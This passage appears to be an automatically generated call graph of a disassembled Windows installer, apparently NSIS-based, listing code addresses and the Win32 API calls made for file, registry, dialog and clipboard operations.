4575->4579 4578 403ea0 5 API calls 4576->4578 4578->4577 4579->4577 4580 4023f0 4581 402403 4580->4581 4582 4024da 4580->4582 4583 40145c 18 API calls 4581->4583 4584 404f9e 25 API calls 4582->4584 4585 40240a 4583->4585 4588 4024f1 4584->4588 4586 40145c 18 API calls 4585->4586 4587 402413 4586->4587 4589 402429 LoadLibraryExW 4587->4589 4590 40241b GetModuleHandleW 4587->4590 4591 4024ce 4589->4591 4592 40243e 4589->4592 4590->4589 4590->4592 4594 404f9e 25 API calls 4591->4594 4604 406391 GlobalAlloc WideCharToMultiByte 4592->4604 4594->4582 4595 402449 4596 40248c 4595->4596 4597 40244f 4595->4597 4598 404f9e 25 API calls 4596->4598 4599 401435 25 API calls 4597->4599 4602 40245f 4597->4602 4600 402496 4598->4600 4599->4602 4601 4062cf 11 API calls 4600->4601 4601->4602 4602->4588 4603 4024c0 FreeLibrary 4602->4603 4603->4588 4605 4063c9 GlobalFree 4604->4605 4606 4063bc GetProcAddress 4604->4606 4605->4595 4606->4605 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4607 4048f8 4608 404906 4607->4608 4609 40491d 4607->4609 4610 40490c 4608->4610 4625 404986 4608->4625 4611 40492b IsWindowVisible 4609->4611 4617 404942 4609->4617 4612 403ddb SendMessageW 4610->4612 4614 404938 4611->4614 4611->4625 4615 404916 4612->4615 4613 40498c CallWindowProcW 4613->4615 4626 40487a SendMessageW 4614->4626 4617->4613 4631 406035 lstrcpynW 4617->4631 4619 404971 4632 405f7d wsprintfW 4619->4632 4621 404978 4622 40141d 80 API calls 4621->4622 4623 40497f 4622->4623 4633 406035 lstrcpynW 4623->4633 4625->4613 4627 4048d7 SendMessageW 4626->4627 4628 40489d GetMessagePos ScreenToClient SendMessageW 4626->4628 4630 4048cf 4627->4630 4629 4048d4 4628->4629 4628->4630 4629->4627 4630->4617 4631->4619 4632->4621 4633->4625 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4634 4020f9 GetDC GetDeviceCaps 4635 401446 18 API calls 4634->4635 4636 402116 MulDiv 4635->4636 4637 401446 18 API calls 4636->4637 4638 40212c 4637->4638 4639 406831 18 API calls 4638->4639 4640 402165 CreateFontIndirectW 4639->4640 4641 4030dc 4640->4641 4642 4030e3 4641->4642 4644 405f7d wsprintfW 4641->4644 4644->4642 4645 4024fb 4646 40145c 18 API calls 4645->4646 4647 402502 4646->4647 4648 40145c 18 API calls 4647->4648 4649 40250c 4648->4649 4650 40145c 18 API calls 4649->4650 4651 402515 4650->4651 4652 40145c 18 API calls 4651->4652 4653 40251f 4652->4653 4654 40145c 18 API calls 4653->4654 4655 402529 4654->4655 4656 40253d 4655->4656 4657 40145c 18 API calls 4655->4657 4658 4062cf 11 API calls 4656->4658 4657->4656 4659 40256a CoCreateInstance 4658->4659 4660 40258c 4659->4660 4661 4026fc 4663 402708 4661->4663 4664 401ee4 4661->4664 4662 406831 18 API calls 4662->4664 4664->4661 4664->4662 3808 4019fd 3809 40145c 18 API calls 3808->3809 3810 401a04 3809->3810 3813 405eab 3810->3813 3814 405eb8 GetTickCount GetTempFileNameW 3813->3814 3815 401a0b 3814->3815 3816 405eee 3814->3816 3816->3814 3816->3815 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f RegQueryValueExW 4693->4694 4698 401a13 4693->4698 4695 402a45 4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 40297b 4753->4760 4761 4062cf 11 API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API calls 4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 4826->4829 4832 403fd9 SendMessageW 4826->4832 4828 403fad SendMessageW 4828->4824 4830 40141d 80 API calls 4829->4830 4830->4832 4832->4827 4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3817 401a1f 3818 40145c 18 API calls 3817->3818 3819 401a26 3818->3819 3820 4062cf 11 API calls 3819->3820 3821 401a49 3820->3821 3822 401a64 3821->3822 3823 401a5c 3821->3823 3892 406035 lstrcpynW 3822->3892 3891 406035 lstrcpynW 3823->3891 3826 401a6f 3893 40674e lstrlenW CharPrevW 3826->3893 3827 401a62 3830 406064 5 API calls 3827->3830 3861 401a81 3830->3861 3831 406301 2 API calls 3831->3861 3834 401a98 CompareFileTime 3834->3861 3835 401ba9 3836 404f9e 25 API calls 3835->3836 3838 401bb3 3836->3838 3837 401b5d 3839 404f9e 25 API calls 3837->3839 3870 40337f 3838->3870 3841 401b70 3839->3841 3845 4062cf 11 API calls 3841->3845 3843 406035 lstrcpynW 3843->3861 3844 4062cf 11 API calls 3846 401bda 3844->3846 3850 401b8b 3845->3850 3847 401be9 SetFileTime 3846->3847 3848 401bf8 CloseHandle 3846->3848 3847->3848 3848->3850 3851 401c09 3848->3851 3849 406831 18 API calls 3849->3861 3852 401c21 3851->3852 3853 401c0e 3851->3853 3854 406831 18 API calls 3852->3854 3855 406831 18 API calls 3853->3855 3856 401c29 3854->3856 3858 401c16 lstrcatW 3855->3858 3859 4062cf 11 API calls 3856->3859 3858->3856 3862 401c34 3859->3862 3860 401b50 3864 401b93 3860->3864 3865 401b53 3860->3865 3861->3831 3861->3834 3861->3835 3861->3837 3861->3843 3861->3849 3861->3860 3863 4062cf 11 API calls 3861->3863 3869 405e7c GetFileAttributesW CreateFileW 3861->3869 3896 405e5c GetFileAttributesW 3861->3896 3899 405ccc 3861->3899 3866 405ccc MessageBoxIndirectW 3862->3866 3863->3861 3867 4062cf 11 API calls 3864->3867 3868 4062cf 11 API calls 3865->3868 3866->3850 3867->3850 3868->3837 3869->3861 3871 40339a 3870->3871 3872 4033c7 3871->3872 3905 403368 SetFilePointer 3871->3905 3903 403336 ReadFile 3872->3903 3876 401bc6 3876->3844 3877 403546 3879 40354a 3877->3879 3880 40356e 3877->3880 3878 4033eb GetTickCount 3878->3876 3883 403438 3878->3883 3881 403336 ReadFile 3879->3881 3880->3876 3884 403336 ReadFile 3880->3884 3885 40358d WriteFile 3880->3885 3881->3876 3882 403336 ReadFile 3882->3883 3883->3876 3883->3882 3887 40348a GetTickCount 3883->3887 3888 4034af MulDiv wsprintfW 3883->3888 3890 4034f3 WriteFile 3883->3890 3884->3880 3885->3876 3886 4035a1 3885->3886 3886->3876 3886->3880 3887->3883 3889 404f9e 25 API calls 3888->3889 3889->3883 3890->3876 3890->3883 3891->3827 3892->3826 3894 401a75 lstrcatW 3893->3894 3895 40676b lstrcatW 3893->3895 3894->3827 3895->3894 3897 405e79 3896->3897 3898 405e6b SetFileAttributesW 3896->3898 3897->3861 3898->3897 3900 405ce1 3899->3900 3901 405d2f 3900->3901 3902 405cf7 MessageBoxIndirectW 3900->3902 3901->3861 3902->3901 3904 403357 3903->3904 3904->3876 3904->3877 3904->3878 3905->3872 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 405f7d wsprintfW 4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW 